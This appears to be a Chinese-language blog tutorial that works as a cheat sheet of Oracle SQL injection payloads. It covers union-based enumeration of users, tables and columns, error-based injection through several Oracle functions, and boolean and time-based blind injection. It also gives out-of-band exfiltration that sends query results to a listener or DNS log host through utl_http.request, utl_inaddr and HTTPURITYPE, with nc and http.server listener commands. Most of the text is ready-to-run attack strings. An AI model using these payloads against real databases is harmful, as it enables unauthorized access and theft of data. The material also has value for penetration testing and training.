WEB安全--SQL注入--Oracle注入

发布于:2025-05-20 ⋅ 阅读:(13) ⋅ 点赞:(0)

一、Oracle知识点了解

1.1、系统变量与表

版本号:SELECT * FROM V$VERSION

用户名:USER、SYS_CONTEXT('USERENV','SESSION_USER')

库名:ALL_USERS、USER_USERS、DBA_USERS

表名:ALL_TABLES、DBA_TABLES、USER_TABLES

字段名:ALL_TAB_COLUMNS、USER_TAB_COLUMNS

1.2、CASE

没有 IF(),用 CASE WHEN ... THEN ... ELSE ... END


1.3、字符串拼接(||)

字符串拼接用 ||,不是 +
 

1.4、延时

DBMS_PIPE.RECEIVE_MESSAGE('X',5)

DBMS_LOCK.SLEEP(5)



1.5、其他注意点

类型严格,最好使用 ?id=1 and 1=(...)-- + 这种形式注入

查询语句后面必须要跟值(from dual):select user from dual

二、Oracle信息查询 

当前用户:UNION SELECT USER FROM DUAL

当前数据库:UNION SELECT SYS_CONTEXT('USERENV','CURRENT_SCHEMA') FROM DUAL

数据库版本:UNION SELECT BANNER FROM V$VERSION

表名枚举:SELECT table_name FROM all_tables

列名枚举:SELECT column_name FROM all_tab_columns WHERE table_name='USERS'

三、Oracle注入手段

3.1、联合查询

注入点判断

?id=-0'+AND+1=1-- 
?id=-0'+AND+1=2--

判断字段数

?id=-0'+ORDER+BY+3--

版本信息

?id=-0'+UNION+SELECT+BANNER,+NULL+FROM+sys.v_$version+WHERE+ROWNUM+=+1--

判断字段类型和回显位置

?id=-0'+UNION+SELECT+NULL+,+NULL+FROM+DUAL--
//修改null为'null',判断字段类型均为字符型
?id=-0'+UNION+SELECT+'NULL'+,+'NULL'+FROM+DUAL--

查看当前数据库

?id=-0'+UNION+SELECT+'NULL'+,+
(select+instance_name+from+V$INSTANCE+where+rownum=1)+FROM+DUAL--

查看当前用户权限

?id=-0'+UNION+SELECT+'NULL'+,+(select+*+from+session_roles+where+rownum=1)
+FROM+DUAL--

查看当前数据库用户

?id=-0'+UNION+SELECT+'NULL'+,+(select+user+from+dual+where+rownum=1)
+FROM+DUAL--

查询表名

?id=-0'+UNION+SELECT+'NULL'+,+
(select+table_name+from+user_tables+where+rownum=1)+FROM+DUAL--

//加入条件限制,不显示第一个表名and+table_name+not+in+'PRODUCTS'
?id=-0'+UNION+SELECT+'NULL'+,+
(select+table_name+from+user_tables+where+rownum=1+and+table_name+not+in+'PRODUCTS')+FROM+DUAL--

查询列名

?id=-0'+UNION+SELECT+'NULL'+,+
(select+column_name+from+user_tab_columns+where+table_name='PRODUCTS'+and+rownum=1)
+FROM+DUAL--

//加入条件限制,不显示第一个列名: and+column_name+not+in+'ID'
?id=-0'+UNION+SELECT+'NULL'+,+
(select+column_name+from+user_tab_columns+where+table_name='PRODUCTS'+and+rownum=1+
and+column_name+not+in+'ID')+FROM+DUAL--

//加入条件限制,不显示第一个和第二个列名: and+column_name+not+in+'ID'+and+column_name+not+in+'CATEGORY'
?id=-0'+UNION+SELECT+'NULL'+,+
(select+column_name+from+user_tab_columns+where+table_name='PRODUCTS'+and+rownum=1+
and+column_name+not+in+'ID'+and+column_name+not+in+'CATEGORY')+FROM+DUAL--

3.2、报错注入

#1.ctxsys.drithsx.sn()
?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --


#2.XMLType()
?id=1 and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --


#3.dbms_xdb_version.checkin()
?id=1 and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --


#4.bms_xdb_version.makeversioned()
?id=1 and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --


#5.dbms_xdb_version.uncheckout()
?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --


#6.dbms_utility.sqlid_to_sqlhash()
?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --


#7.ordsys.ord_dicom.getmappingxpath()
?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--

3.3、布尔盲注

decode函数布尔盲注

#decode(字段或字段的运算,值1,值2,值3)
这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回值3

ASCII码(a-z~A-Z 32~126)
//测试用户名长度
?id=1 and 6=(select length(user) from dual) --
//爆第一个字符
?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',1,0) from dual) --
//爆第二个字符
?id=1 and 1=(select decode(ascii(substr(user,2,1)),'83',1,0) from dual) --
...
//验证爆出的是否正确
?id=1 and 1=(select decode(user,'SYSTEM',1,0) from dual) --

//查数据库,表名,列名,数据都可以结合union注入更换user字符进行注入。
?id=1 and 1=(select decode(ascii(substr((select table_name from user_tables where rownum=1),2,1)),'83',1,0) from dual) --

case then函数布尔盲注

//这句话的意思是当user的第一个字符的ascaii码=83时,返回1,否则返回2
case when ascii(substr(user,1,1))=83 then 1 else 2 end

//盲注中的应用
?id=1 and 1=(case when ascii(substr(user,1,1))=83 then 1 else 2 end)--

3.4、时间盲注

//DBMS_PIPE.RECEIVE_MESSAGE函数的作用是从指定管道获取消息。
用法:DBMS_PIPE.RECEIVE_MESSAGE('pipename',timeout)
pipename:varchar(128)的字符串,用以指定管道名称,在这里我们输入任意值即可。
timeout:integer的可选输入参数,用来指定等待时间。

//盲注中的应用
?id=1 and 1=(dbms_pipe.receive_message('x', 5))--

//结合布尔进行注入
?id=1 and 1=(select 
decode(ascii(substr(user,1,1)),'83',dbms_pipe.receive_message('x',5),0) from dual) --

3.5、外带数据注入

url_http.request()

1.首先检测是否支持url_http.request(),页面返回正常则表示支持
http://127.0.0.1/aaa.php?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --

2.本地监听,观察执行SQL语句反弹输出
python3 -m http.server 8888
或者nc -lvvp 8888

3.http访问时可以将||进行URL编码%7C%7C
http://127.0.0.1/aaa.php?id=1 and utl_http.request('http://IP:8888/'||(select banner from sys.v_$version where rownum=1))=1--

utl_inaddr.get_host_address()

#使用dnslog外带数据  ||进行URL编码%7C%7C
http://127.0.0.1/aaa.php?id=1 and (select utl_inaddr.get_host_address((select user from dual)||'.xxxx.dnslog.cn') from dual)is not null --

bbjhiw.dnslog.cn

HTTPURITYPE()

1.本地监听,观察执行SQL语句反弹输出
python3 -m http.server 8888
或者nc -lvvp 8888

2.http访问时可以将||进行URL编码%7C%7C
http://127.0.0.1/aaa.php?id=1 and (select HTTPURITYPE('http://IP:8888/'||(select user from dual)).GETCLOB() FROM DUAL)is not null --

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布